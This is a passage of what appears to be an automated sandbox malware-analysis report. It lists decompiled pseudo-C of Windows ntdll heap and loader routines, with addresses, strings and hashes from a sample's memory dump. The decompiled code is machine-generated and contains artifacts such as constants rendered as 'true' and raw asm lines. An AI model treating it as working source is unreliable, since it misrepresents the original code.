								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x329865e8;
									if(_t148 != 0) {
										 *0x329891e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								L328ADC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E328A3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E328A9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E328F247B();
									goto L26;
								} else {
									_t152 = E328AA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E328B04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x32899046
0x32899046
0x3289904b
0x32899050
0x32899055
0x3289905b
0x3289905d
0x32899066
0x3289906f
0x32899078
0x32899080
0x32899088
0x3289908f
0x32899095
0x328990a9
0x328990b1
0x328990be
0x328990c6
0x328990cf
0x328990e2
0x328990f7
0x328990fb
0x32899118
0x00000000
0x32899123
0x3289913b
0x3289913f
0x00000000
0x00000000
0x32899147
0x328f231f
0x328f231f
0x00000000
0x328f231f
0x32899154
0x328f2330
0x328f2336
0x328f2336
0x3289915a
0x3289915a
0x3289915a
0x32899161
0x32899167
0x3289916b
0x32899172
0x32899182
0x3289918e
0x32899199
0x328991ba
0x328991be
0x00000000
0x328991e0
0x328f2358
0x328f2360
0x328f2368
0x328f236a
0x328f2372
0x00000000
0x328f2378
0x328f2378
0x328f2381
0x328f2458
0x328f2458
0x328f245b
0x328f2463
0x328f2468
0x328f246e
0x328f246e
0x328f24a7
0x00000000
0x328f24a7
0x328f238f
0x328f2396
0x328f239c
0x328f239f
0x328f239f
0x328f23bb
0x328f23c8
0x328f23ca
0x328f23d2
0x328f244c
0x328f244c
0x328f2453
0x00000000
0x328f23d4
0x328f23e7
0x328f23e9
0x328f23f1
0x00000000
0x00000000
0x328f23f9
0x328f2402
0x328f2408
0x328f240c
0x328f2413
0x328f2423
0x328f243f
0x00000000
0x00000000
0x328f2441
0x328f2446
0x328f2446
0x00000000
0x328f2446
0x328f23fb
0x00000000
0x328f23fb
0x328f23d2
0x00000000
0x328f2372
0x328991be
0x32899118
0x328990fd
0x32899102
0x3289910e

APIs

RtlDebugPrintTimes.NTDLL ref: 328F2360

Strings

$, xrefs: 328990B1
@, xrefs: 32899095

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 83dac093fb68254007659ac8fa4144b2b3964bd0546fdf1666627f43c9d07635
Instruction ID: 95da46d27917edbea0d104b31a1165bf50bf7c79ff0704cf5dd26cdfcd546afb
Opcode Fuzzy Hash: 83dac093fb68254007659ac8fa4144b2b3964bd0546fdf1666627f43c9d07635
Instruction Fuzzy Hash: A7813CB9D012699BDB25CF54CC44BEEB7B8AF08714F0041EAA91DB7250DB709E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 3288F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E3288F8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x3298b370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x32986960 - 2;
					if( *0x32986960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E3288B910();
						} else {
							E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E3288B910();
						__eflags =  *0x32985da8;
						if(__eflags == 0) {
							_t139 = 2;
							L3294FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E328D4B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E329378DE(_t141, _t161, 0, "true", 0);
					}
					L3288FD8E(_t161, _t158);
					E329502EC(_t161);
					_t158 = 1;
					E3288918A(_t161, 1, 0, 0);
					E32958E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x32983758; // 0x0
					 *0x329891e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E329378DE(_t147, _t161, 0, "true", 0);
				}
				L3288FD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E3293F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E3289FED0(0x32984800);
						E3288FAEC(_t161);
						_push(0x32984800);
						E3289E740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E3288FABA( &_v92,  &_v96, 0x8000);
							_t91 = L328A3C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E3294DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E3288FABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E3288FABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E3288FA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = L328A3C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = L328A3C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push("true");
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E328D2F90();
								}
							}
							_t107 = L328A3C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = L328A3C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push("true");
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E328D2F90();
							}
							if(L328A3C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E3294D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}

0x3288f8b0
0x3288f8b8
0x3288f8c2
0x3288f8c6
0x3288f8c9
0x3288f8ce
0x328ee467
0x328ee46e
0x328ee474
0x328ee47a
0x328ee47e
0x328ee49d
0x328ee4a2
0x328ee480
0x328ee495
0x328ee49a
0x328ee4a8
0x328ee4ad
0x328ee4b2
0x328ee4ba
0x328ee4c2
0x328ee4c3
0x328ee4c3
0x328ee4ba
0x3288f9f6
0x3288f9f6
0x3288f9f8
0x3288f9fc
0x3288f9fd
0x3288f9fe
0x3288fa09
0x3288fa09
0x3288f8db
0x328ee4cd
0x328ee4d3
0x328ee4d6
0x3288fa37
0x3288fa37
0x00000000
0x3288fa37
0x328ee4dc
0x328ee4e1
0x328ee4e3
0x328ee4e9
0x328ee4eb
0x328ee4eb
0x328ee4f2
0x328ee4f9
0x328ee504
0x328ee505
0x328ee50c
0x00000000
0x328ee50c
0x3288f8e8
0x328ee516
0x328ee51f
0x328ee525
0x00000000
0x328ee525
0x3288f8ee
0x3288f8ee
0x3288f8f5
0x328ee530
0x328ee532
0x328ee532
0x3288f8fd
0x3288f909
0x328ee53c
0x328ee543
0x00000000
0x00000000
0x328ee54b
0x328ee550
0x328ee552
0x00000000
0x00000000
0x00000000
0x3288f90f
0x3288f90f
0x3288f918
0x00000000
0x3288f91e
0x3288f924
0x3288f92b
0x3288f930
0x3288f931
0x3288f936
0x3288f93c
0x3288f93e
0x328ee55d
0x328ee55f
0x328ee563
0x328ee56a
0x328ee578
0x328ee57c
0x328ee581
0x328ee586
0x328ee588
0x328ee59a
0x328ee58a
0x328ee593
0x328ee593
0x328ee59f
0x328ee5a2
0x328ee5a8
0x328ee5ae
0x328ee5ae
0x328ee5b3
0x328ee5b3
0x3288f94d
0x3288fa0c
0x3288f953
0x3288f953
0x3288f953
0x3288f957
0x3288fa17
0x3288fa1b
0x3288fa28
0x3288fa2d
0x3288fa2d
0x3288f95d
0x3288f965
0x328ee5c7
0x328ee5cc
0x328ee5ce
0x328ee5d3
0x328ee5d3
0x3288f96f
0x3288f981
0x3288f981
0x00000000
0x3288f987
0x3288f98d
0x3288f992
0x3288f999
0x00000000
0x3288f99b
0x3288f99b
0x3288f9a0
0x3288f9ac
0x328ee5e3
0x3288f9b2
0x3288f9b2
0x3288f9b2
0x3288f9b7
0x328ee5ea
0x328ee5f0
0x328ee5f7
0x328ee5fd
0x328ee602
0x328ee604
0x328ee60f
0x328ee60f
0x328ee60f
0x328ee618
0x328ee621
0x328ee622
0x328ee624
0x328ee62c
0x328ee62d
0x328ee631
0x328ee631
0x328ee5f7
0x3288f9bd
0x3288f9c2
0x3288f9ce
0x328ee644
0x3288f9d4
0x3288f9d4
0x3288f9d4
0x3288f9d9
0x328ee64b
0x328ee650
0x328ee652
0x328ee65d
0x328ee65d
0x328ee65d
0x328ee666
0x328ee66f
0x328ee670
0x328ee672
0x328ee67a
0x328ee67b
0x328ee67f
0x328ee67f
0x3288f9e6
0x328ee692
0x3288f9ec
0x3288f9ec
0x3288f9ec
0x3288f9f4
0x3288fa3d
0x3288fa3d
0x00000000
0x3288f9f4
0x3288f999
0x3288f918

APIs

RtlDebugPrintTimes.NTDLL ref: 328EE51F

Strings

HEAP[%wZ]: , xrefs: 328EE490
HEAP: , xrefs: 328EE49D
(HeapHandle != NULL), xrefs: 328EE4A8

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 89efb2510eae0f9587b4c468a3adcfd3278a0d366b653f4f9c0a8f52cc8507bf
Instruction ID: e66c85ca6eb61895a8fc50518515baefa055f8e6c5a296cfe5d911993166ba78
Opcode Fuzzy Hash: 89efb2510eae0f9587b4c468a3adcfd3278a0d366b653f4f9c0a8f52cc8507bf
Instruction Fuzzy Hash: BC91237D204741AFE31ACF28CC80B2AB7A5FF95758F400459E9599B292EF74E841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 328B0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E328B0AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x329868d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x329865f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E328C7550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E3289FED0(0x329832d8);
					if( *0x329865f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x32989218; // 0x0
						_push("true");
						_pop(_t111);
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x329832d8);
						E3289E740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = L32886DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E328998DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x329865f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x329891e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_push("true");
								_pop(_t130);
								_v8 = _t76;
								if(L328B1C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x329868d8;
									if( *0x329868d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x32985d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = L328A5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x329868d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E328D88C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x329868d8 = _v24;
											 *0x32985d4c = _v28;
											goto L9;
										}
										_t89 =  *0x32985d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E328D88C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E328D88C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x329868d8);
										goto L39;
									} else {
										_t101 =  *0x329837c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E3290E692();
											_t101 =  *0x329837c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							L328B0C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							L328ADF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}

0x328b0af6
0x328b0af8
0x328b0afa
0x328b0afd
0x328b0b00
0x328b0b06
0x328f9ea5
0x328f9ea5
0x328b0b13
0x328b0bd3
0x328b0be3
0x328b0be3
0x328b0be5
0x00000000
0x00000000
0x328b0bd8
0x328b0bdb
0x328b0be0
0x328b0be0
0x00000000
0x328b0b19
0x328b0b19
0x328b0b27
0x328b0b2a
0x328b0b36
0x328b0c0d
0x328b0c15
0x328b0c1e
0x328b0c20
0x328b0c21
0x328b0c23
0x328b0c25
0x328b0c25
0x328b0b3e
0x328b0b40
0x328b0b43
0x328b0b46
0x328b0b4b
0x328b0bc2
0x328b0bc2
0x328b0bc7
0x328b0bd2
0x328b0b4d
0x328b0b50
0x328b0b56
0x328b0b59
0x328b0b59
0x328b0b5e
0x328f9eb1
0x328f9eb3
0x328f9eb8
0x328f9ebb
0x328f9ebd
0x00000000
0x00000000
0x328f9ec3
0x328b0b66
0x328b0b69
0x328b0b70
0x328b0bec
0x328b0bf3
0x328b0bfa
0x328b0bfc
0x328b0c02
0x328b0c04
0x328b0c04
0x328b0bf3
0x328b0b72
0x328b0b76
0x328b0b78
0x328b0b7b
0x328b0b7d
0x328b0b7f
0x328b0b80
0x328b0b8a
0x328f9ec8
0x328f9ecb
0x328f9ecb
0x328f9ece
0x328f9ece
0x328f9ed1
0x328f9ed4
0x328f9ed4
0x328f9edc
0x328f9ede
0x328f9ee5
0x328f9ef1
0x328f9ef1
0x328f9ee7
0x328f9ee7
0x328f9eed
0x328f9eed
0x328f9ef4
0x328f9f0a
0x328f9f0c
0x328f9f0f
0x328f9f11
0x328f9f4e
0x328f9f54
0x328f9f56
0x328f9fbb
0x328f9fbe
0x328f9fc1
0x328f9fc4
0x328f9fc4
0x328f9fc7
0x328f9fca
0x328f9fca
0x328f9fd0
0x328f9fd0
0x328f9fd3
0x328f9fdd
0x328f9fe2
0x328f9fe5
0x328f9fe8
0x328f9ff0
0x00000000
0x328f9ff0
0x328f9f58
0x328f9f5d
0x328f9f5d
0x328f9f62
0x328f9f65
0x328f9f6a
0x328f9f6d
0x328f9f70
0x328f9f72
0x328f9f75
0x328f9f78
0x328f9f78
0x328f9f7b
0x328f9f7e
0x328f9f7e
0x328f9f93
0x328f9f9a
0x328f9f9f
0x328f9fb4
0x00000000
0x328f9f13
0x328f9f13
0x328f9f18
0x328f9f1a
0x328f9f1c
0x328f9f21
0x328f9f23
0x328f9f24
0x328f9f29
0x328f9f2e
0x328f9f33
0x328f9f38
0x328f9f3d
0x328f9f3d
0x328f9f40
0x328f9f42
0x328f9f48
0x328f9f48
0x00000000
0x328f9f42
0x328f9f11
0x328b0b8a
0x328b0b90
0x328b0b96
0x328b0ba1
0x328b0baa
0x328b0bb2
0x328b0bb5
0x328b0bb8
0x328b0bbb
0x328b0bbf
0x00000000
0x328b0bbf
0x328b0b4b

APIs

RtlDebugPrintTimes.NTDLL ref: 328B0BFC

Strings

LdrpCheckModule, xrefs: 328F9F24
Failed to allocated memory for shimmed module list, xrefs: 328F9F1C
minkernel\ntdll\ldrinit.c, xrefs: 328F9F2E

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 9f539c727976eab617419ae2f167f9bbcc81928da797ef6be2b3684af896dc4c
Instruction ID: bb85d1cdf08f2b228751ece1dc8bfca291409ae73112768ac5e0ed97ce6b37a0
Opcode Fuzzy Hash: 9f539c727976eab617419ae2f167f9bbcc81928da797ef6be2b3684af896dc4c
Instruction Fuzzy Hash: 3F71B379A042099FEF04DF68C950BAEB7F4EF44308F18446DD919EB750E775A982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 328BEE48 Relevance: 6.3, APIs: 4, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E328BEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push("true");
				_push(0x3296c610);
				L328E7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L328A2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E328A24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x329867f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x329867f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x329867f0; // 0x0
							_t309 =  *0x329867f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x255f7a8
					_t284 =  *(_t316 + 0x20) &  *_t40;
